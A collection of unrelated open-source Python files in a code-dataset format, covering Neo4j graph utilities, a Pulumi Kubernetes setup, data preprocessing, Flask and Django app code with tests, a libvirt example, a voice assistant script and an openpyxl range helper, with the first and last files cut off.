f\"/data/{file_name}.graphml\"\n self.clean_db()\n return file_path\n\n def clean_db(self):\n result = self.graph.run(\"match (n) detach delete n\").data()\n return result\n\n def create_graph_nx(self, graph_dict: dict, merge_nodes_level: str):\n creation_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n graph = nx.MultiDiGraph()\n for node in graph_dict[\"nodes\"]:\n graph.add_node(node[\"name\"] + \"_\" + node[\"level\"],\n labels=f\":magi\",\n magi_display_name=node[\"name\"],\n insert_date=creation_date,\n level=str(node[\"level\"]).strip().upper(),\n **node[\"properties\"])\n\n for relation_triplets in graph_dict[\"relation_triplets\"]:\n graph.add_edge(\n graph_dict[\"nodes\"][relation_triplets[0]][\"name\"] + \"_\" + graph_dict[\"nodes\"][relation_triplets[0]][\n \"level\"],\n graph_dict[\"nodes\"][relation_triplets[2]][\"name\"] + \"_\" + graph_dict[\"nodes\"][relation_triplets[2]][\n \"level\"],\n labels=relation_triplets[1],\n magi_display_name=relation_triplets[1],\n insert_date=creation_date,\n **relation_triplets[3])\n\n local_graphml_name = f\"{str(uuid.uuid4())}.graphml\"\n nx.write_graphml_lxml(graph, local_graphml_name, named_key_ids=True)\n move(local_graphml_name, f\"/data/{local_graphml_name}\")\n self.graph.run(\n f'CALL apoc.import.graphml(\"/data/{local_graphml_name}\", {{readLabels: true, storeNodeIds:true}})').data()\n self.merge_nodes(merge_nodes_level)\n os.remove(f\"/data/{local_graphml_name}\")\n return True\n\n def merge_nodes(self, level: str):\n self.graph.run(\n f'MATCH (n1),(n2) WHERE n1.magi_display_name = n2.magi_display_name and n1.level = n2.level and n1.level starts with \"{str(level).strip().upper()}\" and id(n1) < id(n2) WITH [n1,n2] as ns CALL apoc.refactor.mergeNodes(ns,{{properties:\"overwrite\", mergeRels: \"true\"}}) yield node RETURN true')\n\n def search_graph_for_nlp(self, text: str):\n result = []\n nodes = self.graph.nodes.match().where(f\"_.magi_display_name =~ '(?i){text.strip()}'\").all()\n for node in nodes:\n relationships = self.graph.match(r_type=None, nodes=(node, None)).all()\n for rel in relationships:\n result.append({\n \"relation\": type(rel).__name__,\n \"end_node\": rel.end_node[\"magi_display_name\"]\n })\n return result\n","repo_name":"sametdumankaya/MicroserviceStack","sub_path":"Neo4jAPI/neo4j_utils.py","file_name":"neo4j_utils.py","file_ext":"py","file_size_in_byte":9576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41843083091","text":"import pulumi\nfrom pulumi_kubernetes.apps.v1 import Deployment\nfrom pulumi_kubernetes.core.v1 import Service\nfrom pulumi_kubernetes.helm.v3 import Chart, ChartOpts\n\napi_deployment = Deployment(\n \"api-deployment\",\n spec={\n \"selector\": {\"matchLabels\": {\"app\": \"api\"}},\n \"template\": {\n \"metadata\": {\"labels\": {\"app\": \"api\"}},\n \"spec\": {\n \"containers\": [\n {\n \"name\": \"api\",\n \"image\": \"martins87/my-api\",\n \"env\": [{\"name\": \"JOBS_SERVICE\", \"value\": \"os.environ['JOBS_SERVICE']\"}],\n \"ports\": [{\"name\": \"http\", \"containerPort\": 5000}],\n }\n ]\n },\n },\n },\n)\n\napi_service = Service(\n \"api-service\",\n metadata={\"name\": \"api-service\"},\n spec={\n \"selector\": {\"app\": \"api\"},\n \"ports\": [{\"name\": \"http\", \"port\": 80, \"targetPort\": 5000}],\n \"type\": \"ClusterIP\",\n },\n)\n\njobs_deployment = Deployment(\n \"jobs-deployment\",\n spec={\n \"selector\": {\"matchLabels\": {\"app\": \"jobs\"}},\n \"template\": {\n \"metadata\": {\"labels\": {\"app\": \"jobs\"}},\n \"spec\": {\n \"containers\": [\n {\n \"name\": \"jobs\",\n \"image\": \"martins87/myapp\",\n \"ports\": [{\"name\": \"http\", \"containerPort\": 5001}],\n }\n ]\n },\n },\n },\n)\n\njobs_service = Service(\n \"jobs-service\",\n metadata={\"name\": \"jobs-service\"},\n spec={\n \"selector\": {\"app\": \"jobs\"},\n \"ports\": [{\"name\": \"http\", \"port\": 80, \"targetPort\": 5001}],\n \"type\": \"ClusterIP\",\n },\n)\n","repo_name":"folefac87/DevOps-Challenge","sub_path":"pulumi/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39412616977","text":"# 242. Valid Anagram\n# Given two strings s and t, return true if t is an anagram of s, and false otherwise.\n# An Anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once.\n\nclass Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if len(s) != len(t):\n return False\n \n if \"\".join(sorted(s)) == \"\".join(sorted(t)):\n return True\n else:\n return False\n\n## main\nif __name__ ==\"__main__\":\n s = \"anagram\"\n t = \"aaangrm\"\n\n Sol = Solution()\n print(Sol.isAnagram(s,t))\n","repo_name":"frozen211/MyCode","sub_path":"Python/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42084419232","text":"import numpy as np\nimport pandas as pd\nfrom imblearn.over_sampling import BorderlineSMOTE\nfrom sklearn.model_selection import KFold, train_test_split\n\n\ndef one_column_factorize(column):\n return column.factorize()[0]\n\n\ndef columns_factorize(df):\n for (columnName, columnData) in df.items():\n if columnData.dtype == object:\n df[columnName] = df[columnName].factorize()[0]\n return df\n\n\ndef semi_auto_factorize(data):\n factorize_list = []\n for (columnName, columnData) in data.items():\n if columnData.dtype == object:\n factorized_data, indexes = pd.factorize(data[columnName])\n data[columnName] = factorized_data\n factorize_list.append((columnName, {i: indexes[i] for i in range(len(indexes))}))\n return data, factorize_list\n\n\ndef manual_factorize(data, factorize_list, clip=True, input_fact=False):\n \"\"\"\n Func for factorize dataset\n :param clip: default True, apply np.clip on data, set False for iterate over string values\n :param data: dataset\n :param factorize_list: list of tuples containing column name and mapping dict, [('Sex', {0: 'M', 1: 'F'}),\n ('BodyType', {0: 'Slim', 1: 'Fat'})]\n :param input_fact: default False, set True for factorize input data\n :return data: factorized dataset\n \"\"\"\n for column in factorize_list:\n if clip:\n length = len(column[1])\n # data[column[0]] = data[column[0]].apply(\n # lambda x: 0 if x < 0 else (length - 1 if x >= length else x))\n data[column[0]] = np.clip(data[column[0]], 0, length - 1)\n if input_fact:\n data[column[0]] = data[column[0]].map(column[1])\n # else:\n # data[column[0]] = data[column[0]].map(column[1])\n return data\n\n\ndef cross_validation(data, file_name, n_splits=5):\n kfold = KFold(n_splits=n_splits, shuffle=True)\n\n for i, split_index in enumerate(kfold.split(data)):\n data.iloc[split_index[0]].to_csv(f'train_{i + 1}_{file_name}.csv', index=False)\n data.iloc[split_index[1]].to_csv(f'test_{i + 1}_{file_name}.csv', index=False)\n return True\n\n\ndef simple_split(data, test_size, shuffle=True, random_state=42):\n \"\"\"\n Func for splitting dataset into train and test datasets\n :param data:\n :param test_size:\n :param shuffle: set False to prevent dataset from shuffled\n :param random_state: set None to generate split datasets randomly\n :return: split into train and test datasets\n \"\"\"\n x, y = train_test_split(data, test_size=test_size, shuffle=shuffle, random_state=random_state)\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n return x, y\n\n\ndef borderline_smote(data, target):\n border_smote = BorderlineSMOTE()\n x = data.drop(target, axis=1)\n y = data[target]\n\n x, y = border_smote.fit_resample(x, y)\n\n x[target] = y\n\n return x\n","repo_name":"EnZaNin/SyntheticDataGenerator","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36943995949","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPresence analyzer unit tests.\n\"\"\"\nimport os.path\nimport json\nimport datetime\nimport unittest\n\nfrom presence_analyzer import main, utils\n\n\nTEST_DATA_CSV = os.path.join(\n os.path.dirname(__file__), '..', '..', 'runtime', 'data', 'test_data.csv'\n)\nTEST_DATA_CSV_2 = os.path.join(\n os.path.dirname(__file__), '..', '..', 'runtime', 'data', 'test_data_2.csv'\n)\nTEST_USERS_DATA = os.path.join(\n os.path.dirname(__file__), '..', '..', 'runtime', 'data', 'test_users.xml'\n)\n\n\n# pylint: disable=E1103\nclass PresenceAnalyzerViewsTestCase(unittest.TestCase):\n \"\"\"\n Views tests.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Before each test, set up a environment.\n \"\"\"\n main.app.config.update({\n 'DATA_CSV': TEST_DATA_CSV,\n 'USER_DATA_XML': TEST_USERS_DATA,\n })\n self.client = main.app.test_client()\n\n def tearDown(self):\n \"\"\"\n Get rid of unused objects after each test.\n \"\"\"\n pass\n\n def test_mainpage(self):\n \"\"\"\n Test main page redirect.\n \"\"\"\n resp = self.client.get('/')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Welcome in presence analyzer\", resp.data)\n\n def test_templateview_rendering(self):\n \"\"\"\n Test page rendering with url given template name.\n \"\"\"\n resp = self.client.get('/presence_start_end')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Presence start-end weekday\", resp.data)\n resp = self.client.post('/presence_start_end')\n self.assertEqual(resp.status_code, 405)\n\n resp = self.client.get('/mean_time_weekday')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Presence mean time by weekday\", resp.data)\n resp = self.client.post('/mean_time_weekday')\n self.assertEqual(resp.status_code, 405)\n\n resp = self.client.get('/presence_weekday')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Presence by weekday\", resp.data)\n resp = self.client.post('/presence_weekday')\n self.assertEqual(resp.status_code, 405)\n\n resp = self.client.get('/not_existing_page')\n self.assertEqual(resp.status_code, 404)\n\n def test_api_users(self):\n \"\"\"\n Test users listing.\n \"\"\"\n resp = self.client.get('/api/v1/users')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 2)\n self.assertDictEqual(data[0], {u'user_id': 10, u'name': u'User 10'})\n\n def test_new_api_users(self):\n \"\"\"\n Test users xml api listing.\n \"\"\"\n resp = self.client.get('/api/v2/users')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)['users']\n self.assertEqual(len(data), 3)\n self.assertDictEqual(data[0], {\n u'id': 141,\n u'name': u'Adam P.',\n u'avatar': u'/api/images/users/141'\n })\n \n def test_api_presence_start_end(self):\n \"\"\"\n Test user weekday presence start end\n \"\"\"\n resp = self.client.get('/api/v1/presence_start_end/11')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 7)\n self.assertItemsEqual(data, [\n [u'Mon', 33134, 57257],\n [u'Tue', 33590, 50154],\n [u'Wed', 33206, 58527],\n [u'Thu', 35602, 58586],\n [u'Fri', 47816, 54242],\n [u'Sat', 0, 0],\n [u'Sun', 0, 0],\n ])\n\n def test_api_presence_weekday(self):\n \"\"\"\n Test user presence grouped by weekday api\n \"\"\"\n resp = self.client.get('/api/v1/presence_weekday/10')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 8)\n self.assertItemsEqual(data, [\n [u'Weekday', u'Presence (s)'],\n [u'Mon', 0],\n [u'Tue', 30047],\n [u'Wed', 24465],\n [u'Thu', 23705],\n [u'Fri', 0],\n [u'Sat', 0],\n [u'Sun', 0],\n ])\n\n def test_api_presence_meantime(self):\n \"\"\"\n Test user meantime presence grouped by weekday api\n \"\"\"\n resp = self.client.get('/api/v1/mean_time_weekday/11')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 7)\n self.assertItemsEqual(data, [\n [u'Mon', 24123.0],\n [u'Tue', 16564.0],\n [u'Wed', 25321.0],\n [u'Thu', 22984.0],\n [u'Fri', 6426.0],\n [u'Sat', 0],\n [u'Sun', 0],\n ])\n\n\nclass PresenceAnalyzerUtilsTestCase(unittest.TestCase):\n \"\"\"\n Utility functions tests.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Before each test, set up a environment.\n \"\"\"\n main.app.config.update({\n 'DATA_CSV': TEST_DATA_CSV,\n 'USER_DATA_XML': TEST_USERS_DATA,\n })\n\n def tearDown(self):\n \"\"\"\n Get rid of unused objects after each test.\n \"\"\"\n pass\n\n def test_get_user_data(self):\n \"\"\"\n Test parsing of user XML file.\n \"\"\"\n data = utils.get_user_data()\n self.assertIsInstance(data, dict)\n self.assertItemsEqual(data.keys(), ['users', 'server'])\n self.assertDictEqual(data['users'][1], {\n u'id': 176,\n u'name': u'Adrian K.',\n u'avatar': u'/api/images/users/176'\n })\n self.assertEqual(data['server'], u'https://intranet.stxnext.pl:443')\n\n def test_get_data_caching(self):\n \"\"\"\n Test caching of get_data method.\n \"\"\"\n data = utils.get_data()\n main.app.config.update({\n 'DATA_CSV': TEST_DATA_CSV_2,\n })\n data_cached = utils.get_data()\n self.assertDictEqual(data, data_cached)\n\n def test_get_data(self):\n \"\"\"\n Test parsing of CSV file.\n \"\"\"\n data = utils.get_data()\n self.assertIsInstance(data, dict)\n self.assertItemsEqual(data.keys(), [10, 11])\n sample_date = datetime.date(2013, 9, 10)\n self.assertIn(sample_date, data[10])\n self.assertItemsEqual(data[10][sample_date].keys(), ['start', 'end'])\n self.assertEqual(data[10][sample_date]['start'],\n datetime.time(9, 39, 5))\n\n def test_group_by_weekday(self):\n \"\"\"\n Test weekday grouping\n \"\"\"\n data = utils.get_data()\n weekdays = utils.group_by_weekday(data[10])\n self.assertItemsEqual(weekdays.keys(), range(7))\n self.assertDictEqual(weekdays, {\n 0: [],\n 1: [30047],\n 2: [24465],\n 3: [23705],\n 4: [],\n 5: [],\n 6: [],\n })\n weekdays = utils.group_by_weekday(data[11])\n self.assertDictEqual(weekdays, {\n 0: [24123],\n 1: [16564],\n 2: [25321],\n 3: [22969, 22999],\n 4: [6426],\n 5: [],\n 6: [],\n })\n\n def test_group_start_end_weekday(self):\n \"\"\"\n Test weekday grouping start end\n \"\"\"\n data = utils.get_data()\n weekdays = utils.group_by_weekday_start_end(data[11])\n self.assertItemsEqual(weekdays.keys(), range(7))\n self.assertSequenceEqual(weekdays, {\n 0: {'starts': [33134], 'ends': [57257]},\n 1: {'starts': [33590], 'ends': [50154]},\n 2: {'starts': [33206], 'ends': [58527]},\n 3: {'starts': [37116, 34088], 'ends': [60085, 57087]},\n 4: {'starts': [47816], 'ends': [54242]},\n 5: {'starts': [], 'ends': []},\n 6: {'starts': [], 'ends': []},\n })\n\n def test_seconds_since_midnight(self):\n \"\"\"\n Test seconds since midnight\n \"\"\"\n self.assertEqual(utils.seconds_since_midnight(\n datetime.time(12, 45, 11)), 45911)\n self.assertEqual(utils.seconds_since_midnight(\n datetime.time(0, 0, 1)), 1)\n self.assertEqual(utils.seconds_since_midnight(\n datetime.time(15, 5, 19)), 54319)\n\n def test_interval(self):\n \"\"\"\n Test interval calculation\n \"\"\"\n self.assertEqual(utils.interval(\n datetime.time(12, 0, 0), datetime.time(13, 0, 0)), 3600)\n self.assertEqual(utils.interval(\n datetime.time(13, 0, 0), datetime.time(12, 30, 0)), -1800)\n self.assertEqual(utils.interval(\n datetime.time(4, 4, 4), datetime.time(1, 30, 0)), -9244)\n self.assertEqual(utils.interval(\n datetime.time(0, 0, 0), datetime.time(0, 0, 0)), 0)\n\n def test_mean(self):\n \"\"\"\n Test mean calculation\n \"\"\"\n self.assertEqual(utils.mean(range(1, 8)), 4)\n self.assertAlmostEqual(utils.mean([30.3, 70.2, 1]), 33.8333333)\n self.assertAlmostEqual(utils.mean([0.1, 0.2, 0.3]), 0.2)\n\n\ndef suite():\n \"\"\"\n Default test suite.\n \"\"\"\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(PresenceAnalyzerViewsTestCase))\n suite.addTest(unittest.makeSuite(PresenceAnalyzerUtilsTestCase))\n return suite\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pkucmus/presence-analyzer-pkucmus","sub_path":"src/presence_analyzer/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20752939819","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom django import template\nfrom django.db.models.aggregates import Sum\nfrom ..models import ResultFranke\n\n__author__ = \"pmeier82\"\n\nregister = template.Library()\nres_tbl_nam = ResultFranke.__name__.lower()\n\n\n# FILTERS\n@register.filter\ndef sort(query_set):\n \"\"\"return the sorted queryset\"\"\"\n\n return query_set.order_by(\"{}__unit_gt\".format(res_tbl_nam))\n\n\n@register.filter\ndef summary(query_set):\n \"\"\"summary from result queryset\"\"\"\n\n # early exit\n if not query_set:\n return None\n\n # aggregate\n return query_set.aggregate(\n KS=Sum(\"{}__KS\".format(res_tbl_nam)),\n KSO=Sum(\"{}__KSO\".format(res_tbl_nam)),\n\n FS=Sum(\"{}__FS\".format(res_tbl_nam)),\n\n TP=Sum(\"{}__TP\".format(res_tbl_nam)),\n TPO=Sum(\"{}__TPO\".format(res_tbl_nam)),\n\n FPAE=Sum(\"{}__FPAE\".format(res_tbl_nam)),\n FPAOE=Sum(\"{}__FPAOE\".format(res_tbl_nam)),\n FP=Sum(\"{}__FP\".format(res_tbl_nam)),\n\n FPA=Sum(\"{}__FPA\".format(res_tbl_nam)),\n FPAO=Sum(\"{}__FPAO\".format(res_tbl_nam)),\n\n FN=Sum(\"{}__FN\".format(res_tbl_nam)),\n FNO=Sum(\"{}__FNO\".format(res_tbl_nam)))\n\n\n@register.filter\ndef summary_table(query_set):\n \"\"\"summary table from result queryset\"\"\"\n\n # early exit\n if not query_set:\n return None\n qs_sum = summary(query_set)\n if not qs_sum:\n return None\n\n # return dict\n return {\"FP\": qs_sum[\"FP\"],\n\n \"FN\": qs_sum[\"FN\"] + qs_sum[\"FNO\"],\n 'FNno': qs_sum[\"FN\"],\n \"FNo\": qs_sum[\"FNO\"],\n\n \"FPAE\": qs_sum[\"FPAE\"] + qs_sum[\"FPAOE\"],\n \"FPAEno\": qs_sum[\"FPAE\"],\n \"FPAEo\": qs_sum[\"FPAOE\"],\n\n \"error_sum\": qs_sum[\"FP\"] + qs_sum[\"FN\"] + qs_sum[\"FPAE\"]}\n\n\n@register.filter\ndef summary_short(query_set):\n \"\"\"short summary from result queryset\"\"\"\n\n # early exit\n if not query_set:\n return None\n qs_sum = summary(query_set)\n if not qs_sum:\n return None\n\n # result dict\n return {\n \"TP\": (qs_sum[\"TP\"] + qs_sum[\"TPO\"]) / float(qs_sum[\"KS\"]) * 100,\n \"FP\": (qs_sum[\"FS\"] - qs_sum[\"TP\"] - qs_sum[\"TPO\"]) / float(qs_sum[\"KS\"]) * 100}\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pmeier82-zz/django-spikeval-franke","sub_path":"djspikeval_franke/templatetags/djspikeval_franke_tags.py","file_name":"djspikeval_franke_tags.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10275731811","text":"# Example-30.py\n#!/usr/bin/env python3\nimport sys\nimport libvirt\n\nconn = None\ntry:\n conn = libvirt.open(\"qemu:///system\")\nexcept libvirt.libvirtError as e:\n print(repr(e), file=sys.stderr)\n exit(1)\n\nstats = conn.getCPUStats(0)\n\nprint(\"kernel: \" + str(stats['kernel']))\nprint(\"idle: \" + str(stats['idle']))\nprint(\"user: \" + str(stats['user']))\nprint(\"iowait: \" + str(stats['iowait']))\n\nconn.close()\nexit(0)\n","repo_name":"libvirt/libvirt-appdev-guide-python","sub_path":"en-US/extras/Connections-Example-30.py","file_name":"Connections-Example-30.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4390342679","text":"# -*- coding:utf-8 -*-\r\n\r\nimport minghu6.algs.func as func\r\n\r\n\r\ndef test_chain_apply():\r\n import operator\r\n from functools import partial\r\n funcs = [partial(operator.add, 1), partial(operator.mul, 2)]\r\n assert func.chain_apply(funcs, 3) == 8\r\n\r\n\r\ndef test_flatten():\r\n assert list(func.flatten([[1, 2], 3, [4], [5, [1, [2]]]])) == [1, 2, 3, 4, 5, 1, 2]\r\n\r\n\r\nif __name__ == '__main__':\r\n test_chain_apply()\r\n test_flatten()\r\n","repo_name":"minghu6/py-minghu6","sub_path":"minghu6_test/algs/func_test.py","file_name":"func_test.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"34158156921","text":"import requests\n\nBASE = \"http://127.0.0.1:5000/\"\n\ndata = [{\"name\": \"My First Video\", \"views\": 10000, \"likes\": 10},\n {\"name\": \"My second video\", \"views\": 20000, \"likes\": 50},\n {\"name\": \"How to make REST API in Python\", \"views\": 30000, \"likes\": 100}]\n\nresponse = requests.patch(BASE + \"video/2\", {\"name\": \"Tim\", \"views\": 100, \"likes\": 35})\nprint(response.json())\n\n# for i in range(len(data)):\n# response = requests.put(BASE + \"video/\" + str(i), data[i])\n# print(response.json())\n\ninput()\nresponse = requests.get(BASE + \"video/2\")\nprint(response.json())\n\n","repo_name":"nguyenle0912/Flask-RestAPI","sub_path":"Youtube_RestAPI/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8627977691","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 8 06:09:34 2021\r\n\r\n@author: ediaz\r\n\"\"\"\r\n\r\nimport pyttsx3 as p\r\nimport speech_recognition as sr\r\nimport PySimpleGUI as sg\r\n\r\n\r\nengine = p.init()\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', 180)\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty(\"voice\", voices[1].id)\r\n\r\n\r\ndef ToDoItem(num):\r\n return [sg.Text(f'{num}. '), sg.CBox(''), sg.In()]\r\n\r\ndef speak(text):\r\n engine.say(text)\r\n engine.runAndWait()\r\n \r\nr = sr.Recognizer()\r\n\r\nspeak(\"Hello sir I'm your voice assistant. How are you?\")\r\n\r\nwith sr.Microphone() as source:\r\n r.energy_threshold = 10000\r\n r.adjust_for_ambient_noise(source, 1.2)\r\n print(\"listening...\")\r\n audio = r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(text)\r\nif \"what\" and \"about\" and \"you\" in text:\r\n speak(\"I am having a good day sir, thanks for asking.\")\r\nspeak(\"What can I do for you??\")\r\n\r\n#=============================================================================\r\nwith sr.Microphone() as source:\r\n r.energy_threshold = 10000\r\n r.adjust_for_ambient_noise(source, 1.2)\r\n print(\"listening...\")\r\n audio = r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(text)\r\n \r\nif \"make me a to do list\":\r\n speak(\"Here's your to do list.\")\r\n layout = [ToDoItem(x) for x in range(1,6)] + [[sg.Button('Save'), sg.Button('Exit')]]\r\n window = sg.Window('To Do List Example', layout)\r\n event, values = window.read()\r\n \r\nif \"need\" and \"anything\":\r\n speak('Can you give me some more game ')\r\n\r\nwith sr.Microphone() as source:\r\n r.energy_threshold = 10000\r\n r.adjust_for_ambient_noise(source, 1.2)\r\n print(\"listening...\")\r\n audio = r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(text)\r\n\r\nif\"you know what Im saying\" or \"you feel me\":\r\n speak(\"Facts, u aint never lie.\")\r\n#=============================================================================\r\n \r\n \r\n ","repo_name":"diazer86/voiceAssistant","sub_path":"voice _assistant.py","file_name":"voice _assistant.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70354997652","text":"import numpy as np\nimport matplotlib.pyplot as plt \n\nf1 = plt.figure() \n#plt.axis([0, 4, 0, 10])\n\nplt.plot([1,2,3], [1,2,3], 'go-', label='line 1', linewidth=2)\nplt.plot([1,2,3], [1,4,9], 'rs-', label='line 2')\nplt.legend()\nplt.show()","repo_name":"listenviolet/Lab","sub_path":"ML/ch3_linear_model/3.5_LDA/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18311730211","text":"import feedparser \r\nimport nltk\r\n\r\nurl = \"\"\r\nllog = feedparser.parse(\"{}\".format(url))\r\nentries = llog.entries\r\npost = entries[3]\r\ntitle = post.title\r\n\r\ncontent = post.content[2].value\r\ntokens = nltk.tokenize(nltk.clean_html(content))\r\nprint(tokens)\r\n","repo_name":"ackmedtijani/Python-Practices","sub_path":"Practice2.py","file_name":"Practice2.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21714625871","text":"from datasets import bc_idc, cifar10, cifar100, cinic10, yahoo, tiny_image_net, criteo, breast_cancer_wisconsin\r\nimport torchvision.datasets as datasets\r\n\r\n\r\ndef get_dataset_by_name(dataset_name):\r\n dict_dataset = {\r\n 'BC_IDC': bc_idc.IdcDataset,\r\n 'CIFAR10': datasets.CIFAR10,\r\n 'CIFAR100': datasets.CIFAR100,\r\n 'CINIC10L': cinic10.CINIC10L,\r\n 'Yahoo': yahoo.YahooSetup(),\r\n 'TinyImageNet': tiny_image_net.TinyImageNet,\r\n 'Criteo': criteo.Criteo,\r\n 'BCW': breast_cancer_wisconsin.BcwDataset\r\n }\r\n dataset = dict_dataset[dataset_name]\r\n return dataset\r\n\r\n\r\ndef get_datasets_for_ssl(dataset_name, file_path, n_labeled, party_num=None):\r\n dataset_setup = get_dataset_setup_by_name(dataset_name)\r\n train_labeled_set, train_unlabeled_set, test_set, train_complete_dataset = \\\r\n dataset_setup.set_datasets_for_ssl(file_path, n_labeled, party_num)\r\n return train_labeled_set, train_unlabeled_set, test_set, train_complete_dataset\r\n\r\n\r\ndef get_dataset_setup_by_name(dataset_name):\r\n dict_dataset_setup = {\r\n 'BC_IDC': bc_idc.IdcSetup(),\r\n 'CIFAR10': cifar10.Cifar10Setup(),\r\n 'CIFAR100': cifar100.Cifar100Setup(),\r\n 'CINIC10L': cinic10.Cinic10LSetup(),\r\n 'Yahoo': yahoo.YahooSetup(),\r\n 'TinyImageNet': tiny_image_net.TinyImageNetSetup(),\r\n 'Criteo': criteo.CriteoSetup(),\r\n 'BCW':breast_cancer_wisconsin.BcwSetup()\r\n }\r\n dataset_setup = dict_dataset_setup[dataset_name]\r\n return dataset_setup\r\n","repo_name":"FuChong-cyber/label-inference-attacks","sub_path":"Code/datasets/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"66"} +{"seq_id":"35308562393","text":"from __future__ import annotations\nimport re\nimport openpyxl\nfrom typing import Optional,Any,Generator,Callable,Iterator,Iterable,NamedTuple\nfrom pathlib import Path\nfrom openpyxl.worksheet.worksheet import Worksheet\nfrom openpyxl import Workbook\nfrom collections import namedtuple\nfrom dataclasses import dataclass,field\nfrom types import MethodType\n\n_REPCHAR = ['/','-',' ','\\\\','&',]\n_REPCHAR_RE = re.compile(r'|'.join([fr\"{c}+\" for c in _REPCHAR]))\n_SNK_RE = re.compile(r'(?str:\n return f\"{self.__class__.__name__}({', '.join([k+'='+str(v) for (k,v) in self.__dict__.items()])})\"\n\n@dataclass\nclass ImplicitNamedRange:\n name:str\n min_row:int \n min_col:int\n max_col:int\n max_row:int\n sheet:Worksheet = field(repr=False)\n _nested:list[tuple[int,int]] = field(default_factory=list,repr=False)\n _nt:type = field(repr=False,default=None)\n\n def implicit_named_ranges(self)->dict[tuple[int,str],ImplicitNamedRange]:\n ret = {}\n if self._nested:\n for t in self._nested:\n nr = self.sheet._nr[t]\n ret[t] = nr\n for k,v in nr.implicit_named_ranges().items():\n ret[k] = v \n return ret\n\n @property\n def has_nested(self)->bool:\n return self._nested != []\n\n @staticmethod\n def _var_name(o:Any)->str:\n o = _REPCHAR_RE.sub('_',o)\n o = \"\".join(c for c in str(o) if c.isalnum() or c=='_')\n if not o or o[0].isnumeric():\n o = '_'+o\n return o\n\n\n @classmethod\n def _snake_case(cls,o:str)->str:\n return _SNK_RE.sub('_', cls._var_name(o)).lower()\n\n @classmethod\n def _camel_case(cls,o:str)->str:\n return ''.join(w.title() for w in cls._snake_case(o).split('_'))\n\n @property\n def nrows(self)->int:\n return self.max_row-self.min_row\n\n @property\n def top_row(self)->list[Any]:\n return list(self.iter_rows(max_row=1,values_only=True))[0]\n\n @property\n def header(self)->list[str]:\n return [self._snake_case(str(c)) for c in self.top_row]\n\n def iter_rows(self,values_only:bool=False,min_row:int=0,max_row:int=0)->Generator:\n min_row = self.min_row+min_row\n if not max_row or min_row+max_row>self.max_row:\n max_row = self.max_row\n else:\n max_row = min_row + max_row\n\n \n return self.sheet.iter_rows(min_row=min_row,\n max_row=max_row,\n max_col=self.max_col,\n min_col=self.min_col,\n values_only=values_only)\n\n\n def named_tuples(self,)->Generator[NamedTuple,None,None]:\n if not self._nt:\n try:\n self._nt = namedtuple(self._camel_case(self.name),' 